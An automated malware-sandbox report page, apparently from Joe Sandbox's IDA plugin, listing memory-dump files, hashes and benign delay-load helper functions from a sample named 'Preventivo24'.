Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 504afa78b859fea46496f75508f9863a8a8bee5bc6c83b97f87c8966b79473d7
Instruction ID: aee64a2ffd24241c149c65852903f9fc2fea32f4b95408fd46aa04138fdc2936
Opcode Fuzzy Hash: 504afa78b859fea46496f75508f9863a8a8bee5bc6c83b97f87c8966b79473d7
Instruction Fuzzy Hash: 4DE075B2C0020D9ADF00EFD5C456FEFBBB8EF08310F504066A205E6181EB7457488BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00C03E49 Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85ccb50434c9a380cb11bcb9089d8680888e111a735e34d010192815c7977bb4
Instruction ID: c7f068a74bf7c714242188e3e5386fc4fa6c8ee2d5713a04b35ac94917d58216
Opcode Fuzzy Hash: 85ccb50434c9a380cb11bcb9089d8680888e111a735e34d010192815c7977bb4
Instruction Fuzzy Hash: C4E08C31E0136863DB302B26CC05B5B7A5C9F00BA0B0902216D38AB1D1CB20EF01D6E0

Uniqueness

Uniqueness Score: -1.00%

Function 00BEA38B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BEA39D

Part of subcall function 00BE79ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00BE79F8
Part of subcall function 00BE79ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BE7A60
Part of subcall function 00BE79ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BE7A71

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 400db886f509899edfc978895952c8e5c1d7a986d3c092f3c8c33905c017991b
Instruction ID: 39ea5d005795a280b13f5ebde00985d62436a60550663e15857be19ad8af4e46
Opcode Fuzzy Hash: 400db886f509899edfc978895952c8e5c1d7a986d3c092f3c8c33905c017991b
Instruction Fuzzy Hash: 3FB012E62AC390BD310421026E47C36018CC4C0B10330425AF000D4041ED429E4B2436

Uniqueness

Uniqueness Score: -1.00%

Function 00BEA3CE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BEA39D

Part of subcall function 00BE79ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00BE79F8
Part of subcall function 00BE79ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BE7A60
Part of subcall function 00BE79ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BE7A71

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 111f42487615c7c6e7991ef0a23add15a4dc13707531f9a5790255883823d59d
Instruction ID: 338ce63d485551eb7e149857d2bbb796ccf3350859d93dd1f7d798e5f97df207
Opcode Fuzzy Hash: 111f42487615c7c6e7991ef0a23add15a4dc13707531f9a5790255883823d59d
Instruction Fuzzy Hash: E0B012A62AC3A0BD310461066D43C3601CCC4C0B10330825AF400C5141DD419C4A2436

Uniqueness

Uniqueness Score: -1.00%

Function 00C10968 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00C10937

Part of subcall function 00BE79ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00BE79F8
Part of subcall function 00BE79ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BE7A60
Part of subcall function 00BE79ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BE7A71

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 702bbc6a6e12ff7b8cd176c177ff0d4bae9c563bc1ef97a60a42b57fcadc425a
Instruction ID: 7c995648dc4e081dc5356a99d50af0b155d4e7cf0205a22fe07d450e3c1c9562
Opcode Fuzzy Hash: 702bbc6a6e12ff7b8cd176c177ff0d4bae9c563bc1ef97a60a42b57fcadc425a
Instruction Fuzzy Hash: 6AB012E52DD241FD314451063D13C36019CC8C4B34730402AF000C5142DD808C842431

Uniqueness

Uniqueness Score: -1.00%

Function 00BE6EFA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BE6EF1

Part of subcall function 00BE79ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00BE79F8
Part of subcall function 00BE79ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BE7A60
Part of subcall function 00BE79ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BE7A71

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 823109d1632efe070e8465b84429b74e42a7cd52a5f62c39a240b40db9ffa0c2
Instruction ID: 213f10a300357d698bbe6e3e37758a38c156cd8f2d69624a306f28099cf7c054
Opcode Fuzzy Hash: 823109d1632efe070e8465b84429b74e42a7cd52a5f62c39a240b40db9ffa0c2
Instruction Fuzzy Hash: 65B012E929C2C0BD3104A2076D03C3602CCC5D0F1033040BEF011C1281DD40CC052032

Uniqueness

Uniqueness Score: -1.00%

Function 00BE6EDF Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BE6EF1

Part of subcall function 00BE79ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00BE79F8
Part of subcall function 00BE79ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BE7A60
Part of subcall function 00BE79ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BE7A71

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: a764b364d579ff057bb7099411b4cda0bd624dc1d5c4ee9b7a3745d7b4350ed2
Instruction ID: dc406fd5e00efdc20fd3b2075aa42721f7f4850f0c1f4b798677b62119c1cb18
Opcode Fuzzy Hash: a764b364d579ff057bb7099411b4cda0bd624dc1d5c4ee9b7a3745d7b4350ed2
Instruction Fuzzy Hash: 2FB012ED29C3C0BE31046203AD03C3702CCC4D0F1033041BEF051C0181DD40CC452072

Uniqueness

Uniqueness Score: -1.00%

Function 00BE6F72 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BE6EF1

Part of subcall function 00BE79ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00BE79F8
Part of subcall function 00BE79ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BE7A60
Part of subcall function 00BE79ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BE7A71

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: b0e8cd7f9912c4886655aa46c85b4eefe2a47b8ac61e2505382ff9405144b4a1
Instruction ID: b8d70e3b26c9f86ec5591d8045e38af0e70d5e3008b7227ffa3a8aa2b31e54c7
Opcode Fuzzy Hash: b0e8cd7f9912c4886655aa46c85b4eefe2a47b8ac61e2505382ff9405144b4a1
Instruction Fuzzy Hash: 7BB012BD29E380BD3104A1067D03C3702CCC4D0B1073040BEF420C1181DD40CC092131

Uniqueness

Uniqueness Score: -1.00%

Function 00BE6F4A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BE6EF1

Part of subcall function 00BE79ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00BE79F8
Part of subcall function 00BE79ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BE7A60
Part of subcall function 00BE79ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BE7A71

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 3853c5002841d4ab1f27bc568a91a07b1a4ae71fb9e7b9671dff30b9e45af134
Instruction ID: e47773dc80d9c0eedc68354ded2696a80285f99215503fc0f800d4d893f86e03
Opcode Fuzzy Hash: 3853c5002841d4ab1f27bc568a91a07b1a4ae71fb9e7b9671dff30b9e45af134
Instruction Fuzzy Hash: A8B012BD29C380BD3104A1066D03C3702CCD4E0B5033041BFF010C1181DD40DC062039

Uniqueness

Uniqueness Score: -1.00%

Function 00BE7586 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BE752D

Part of subcall function 00BE79ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00BE79F8
Part of subcall function 00BE79ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BE7A60
Part of subcall function 00BE79ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BE7A71

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: d49dc2874cecd55226bf2af3b261d33f528ab76977c1964bf788ebc0122dc478
Instruction ID: af69b4c309c29bd5750f9a08f423a6b6aa7b1c039f471fb9b9103c0fe94a3215
Opcode Fuzzy Hash: d49dc2874cecd55226bf2af3b261d33f528ab76977c1964bf788ebc0122dc478
Instruction Fuzzy Hash: E6B012A52DC2C0BD314861162E03C3601ECC4E0B10330809EF000C1141FD41CD4A3031

Uniqueness

Uniqueness Score: -1.00%

Function 00BE75FE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BE75F5

Part of subcall function 00BE79ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00BE79F8
Part of subcall function 00BE79ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BE7A60
Part of subcall function 00BE79ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BE7A71

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 4af414193dcd69b4feab73dbbb720d97fa8a2cfa78565a7baf3e4cc2809b2129
Instruction ID: 392fd9b2d0c9b1331e0f844ba70f49578682fde6c12896f3e844ba3d0fbae7b4
Opcode Fuzzy Hash: 4af414193dcd69b4feab73dbbb720d97fa8a2cfa78565a7baf3e4cc2809b2129
Instruction Fuzzy Hash: 17B012FA2DD3D0FD310461066D03C3A01CCD4D0B10730909AF400C1141DD40DC051031

Uniqueness

Uniqueness Score: -1.00%

Function 00BE75D3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BE75B6

Part of subcall function 00BE79ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00BE79F8
Part of subcall function 00BE79ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BE7A60
Part of subcall function 00BE79ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BE7A71

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 69a644c701eb3939f5ef92ba5a4f1d7422e3615e44c9f60b060c6fb27ac99b3f
Instruction ID: 7c9f8dc7e5270c68b166768e22b4c1cc11bdc1a54b3b46a12dc0a5d0b0911be1
Opcode Fuzzy Hash: 69a644c701eb3939f5ef92ba5a4f1d7422e3615e44c9f60b060c6fb27ac99b3f
Instruction Fuzzy Hash: 14B012A52DD381BE314461063E03D3701DCC4D4B10330406BF480C1141DE418E0B2231

Uniqueness

Uniqueness Score: -1.00%

Function 00BE75C9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BE75B6

Part of subcall function 00BE79ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00BE79F8
Part of subcall function 00BE79ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BE7A60
Part of subcall function 00BE79ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BE7A71

Memory Dump Source

Source File: 00000000.00000002.2032224687.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2032198566.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032565109.0000000000C77000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032720224.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032780086.0000000000D2D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032817866.0000000000D2E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032918936.0000000000D6B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 6b4d246351fb5ca603576963e308e34e3d8c66e130228dccf5de4f11c9e10ce9
Instruction ID: 81768b6e4f02233c8c9e5c971d7b4abbcfdeb6a59678745606f09a636d978389
Opcode Fuzzy Hash: 6b4d246351fb5ca603576963e308e34e3d8c66e130228dccf5de4f11c9e10ce9
Instruction Fuzzy Hash: 7CB012A52DD381BE314472063D03D3701DCC4D4B10330456BF480C1141DE808C4A1131

Uniqueness

Uniqueness Score: -1.00%

Function 00BE757C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BE752D

Part of subcall function 00BE79ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00BE79F8
Part of subcall function 00BE79ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BE7A60
